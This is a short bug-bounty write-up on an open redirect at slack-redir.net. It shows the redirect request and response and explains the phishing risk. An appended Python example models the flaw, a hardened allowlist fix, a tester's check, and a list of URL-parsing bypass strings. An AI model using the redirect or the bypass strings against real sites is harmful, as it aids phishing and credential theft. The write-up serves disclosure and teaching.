Open Redirect in SLACK
Slack is cloud-based collaboration software. Originally created in 2009 as a chat tool for a now-defunct gaming technology, Slack has gained currency among enterprises and is broadening into a collaboration platform with capabilities beyond messaging.
I discovered an open redirect vulnerability on slack-redir.net. Another low-risk bug that I found xD
Steps to Reproduce
- Go to
- This will redirect you automatically.
GET /link?url=https://abaykan.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36
Accept-Encoding: gzip, deflate
HTTP/1.1 302 Found
Date: Fri, 15 Feb 2019 17:36:15 GMT
Unfortunately I got an error while trying to inject XSS.
An attacker can redirect a victim to a malicious site through the legitimate slack-redir.net domain name; the destination can be a copy of the real site that asks the user for their credentials.
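To make the reproduction steps and the attack concrete, here is an added example (my own code, not Slack's implementation and not from the original report): a minimal model of a "/link?url=" redirect endpoint in the unvalidated form described above, a hardened form that only bounces to an allowlisted host, and the check a tester applies to a captured 302 response without following it. The function names, the TRUSTED_HOSTS allowlist and the query strings are assumptions made for the example.

```python
# Added example, not Slack's code: a model of an unvalidated "/link?url="
# redirect, its hardened form, and the tester-side check for an open redirect.
# TRUSTED_HOSTS, the function names and the sample inputs are assumptions.
from __future__ import annotations
from urllib.parse import urlsplit, parse_qs

TRUSTED_HOSTS = {"slack.com", "app.slack.com"}   # assumed allowlist


def vulnerable_redirect(query: str) -> tuple[int, dict]:
    """Model of the behaviour reported above: whatever the 'url' parameter
    carries becomes the Location header without any validation."""
    target = parse_qs(query).get("url", [""])[0]
    return 302, {"Location": target}


def is_trusted_target(target: str) -> bool:
    """Accept only absolute http(s) URLs whose host is on the allowlist.

    urlsplit() is used instead of string prefix checks so the usual bypasses
    are refused: scheme-relative '//evil.example', 'https:evil.example' (no
    authority), userinfo tricks such as 'https://slack.com@evil.example',
    'javascript:' URLs, and backslash confusion 'https://slack.com\\@evil.example'.
    """
    if "\\" in target:
        return False            # browsers treat '\' like '/', parsers often do not
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = (parts.hostname or "").lower()
    return host in TRUSTED_HOSTS


def safe_redirect(query: str) -> tuple[int, dict]:
    """Hardened form: untrusted targets get a 400 instead of a 302, so the
    trusted domain can no longer be used as a bounce to a phishing page."""
    target = parse_qs(query).get("url", [""])[0]
    if not is_trusted_target(target):
        return 400, {}
    return 302, {"Location": target}


def is_open_redirect(status: int, headers: dict, origin_host: str) -> bool:
    """Tester-side check over a captured response (redirects not followed):
    a 3xx whose Location resolves to a host other than the origin."""
    if status not in (301, 302, 303, 307, 308):
        return False
    location = headers.get("Location", "")
    host = (urlsplit(location).hostname or "").lower()
    return host != "" and host != origin_host.lower()


if __name__ == "__main__":
    # Constructed query string mirroring the request in the write-up.
    q = "url=https://abaykan.com/"
    status, hdrs = vulnerable_redirect(q)
    print(status, hdrs, is_open_redirect(status, hdrs, "slack-redir.net"))
    print(safe_redirect(q))
    print(safe_redirect("url=https://app.slack.com/client"))
```

The allowlist check is deliberately host-based rather than prefix-based: a check such as `target.startswith("https://slack.com")` still lets `https://slack.com.evil.example/` and `https://slack.com@evil.example/` through, which is why the example parses the URL and compares the hostname.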